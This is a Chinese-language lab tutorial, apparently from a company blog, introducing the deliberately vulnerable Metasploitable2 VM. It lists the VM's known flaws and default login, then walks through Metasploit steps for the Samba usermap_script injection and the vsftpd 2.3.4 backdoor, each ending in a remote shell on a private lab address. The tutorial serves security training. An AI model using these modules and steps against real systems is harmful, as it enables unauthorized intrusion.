溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

如何分析Metasploit中的Metasploitable2

發(fā)布時間:2021-12-09 18:21:43 來源:億速云 閱讀:179 作者:柒染 欄目:大數(shù)據(jù)

本篇文章為大家展示了如何分析Metasploit中的Metasploitable2,內(nèi)容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細(xì)介紹希望你能有所收獲。

一、Metasploitable2簡介

       Metasploitable2虛擬系統(tǒng)是一個特別制作的ubuntu操作系統(tǒng),本身設(shè)計目的是作為安全工具測試和演示常見漏洞攻擊的環(huán)境。其中最重要的是可以用來作為MSF攻擊用的靶機。    

       開放了很多的高危端口如21、23、445等,而且具有很多未打補丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且對外開放了很多服務(wù),并且數(shù)據(jù)庫允許外聯(lián)等。系統(tǒng)中的用戶口令均為弱口令。系統(tǒng)搭載了DVWA、Mutillidae等Web漏洞演練平臺。

Metasploit able 2是一個虛擬機文件, 從網(wǎng)上下載解壓之后就可以直接使用,不需要自己安裝。     

       下載地址:    

       https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

       用戶名:msfadmin 密碼:msfadmin

二、Metasploitable2漏洞列表

1、弱口令漏洞(如vnc、mysql、PostgreSQL等)

2、Samba MS-RPC Shell命令注入漏洞 

3、Vsftpd源碼包后門漏洞 

4、UnreallRCd后門漏洞 

5、Linux NFS共享目錄配置漏洞

6、Java RMI SERVER命令執(zhí)行漏洞

7、Tomcat管理臺默認(rèn)口令漏洞

8、root用戶弱口令漏洞(SSH爆破) 

9、Distcc后門漏洞 

10、Samba sysmlink默認(rèn)配置目錄遍歷漏洞 

11、PHP CGI參數(shù)注入執(zhí)行漏洞

12、DRuby遠(yuǎn)程代碼執(zhí)行漏洞 

13、Ingreslock后門漏洞 

14、Rlogin后門漏洞

三、Samba MS-RPC Shell命令注入漏洞 

漏洞產(chǎn)生原因:傳遞通過MS-RPC提供的未過濾的用戶 輸入在調(diào)用定義的外部腳本時調(diào)用/bin/sh,在smb.conf中,導(dǎo)致允許遠(yuǎn)程命令執(zhí)行。 

攻擊機:kali linux IP:192.168.1.133 

靶機:Metasploitable2 IP:192.168.1.131

1、啟動數(shù)據(jù)庫并且打開metasploit控制臺:msfconsole

如何分析Metasploit中的Metasploitable2

2、搜索可利用的模塊:search samba

如何分析Metasploit中的Metasploitable2

3、選擇要利用的模塊:use exploit/multi/samba/usermap_script

查看需要設(shè)置的參數(shù):show options 

 需要設(shè)置目標(biāo)ip和端口(默認(rèn)139)

如何分析Metasploit中的Metasploitable2

4、設(shè)置目標(biāo)主機地址:192.168.1.131 

如何分析Metasploit中的Metasploitable2

5、運行:run 此時已建立shell連接

如何分析Metasploit中的Metasploitable2

6、查看目標(biāo)主機目錄文件:ls

如何分析Metasploit中的Metasploitable2

四、Vsftpd源碼包后門漏洞

漏洞產(chǎn)生原因:在特定版本的vsftpd服務(wù)器程序中, 被人惡意植入代碼,當(dāng)用戶名以“:)”為結(jié)尾,服務(wù)器就會在6200端口監(jiān)聽,并且能夠執(zhí)行任意惡意代碼。 

攻擊機:kali linux IP:192.168.1.133 

靶機:Metasploitable2 IP:192.168.1.136

1、搜索可用攻擊模塊:search vsftpd

如何分析Metasploit中的Metasploitable2

2、選擇要利用的模塊:useexploit/unix/ftp/vsftpd_234_backdoor 

查看需要設(shè)置的參數(shù):show options 

 需要設(shè)置目標(biāo)ip和端口(默認(rèn)21)

如何分析Metasploit中的Metasploitable2

3、設(shè)置目標(biāo)主機地址:192.168.1.136 

如何分析Metasploit中的Metasploitable2

4、 運行:run 此時已建立shell連接

如何分析Metasploit中的Metasploitable2

5、查看目標(biāo)主機目錄文件:ls

如何分析Metasploit中的Metasploitable2

上述內(nèi)容就是如何分析Metasploit中的Metasploitable2,你們學(xué)到知識或技能了嗎?如果還想學(xué)到更多技能或者豐富自己的知識儲備,歡迎關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI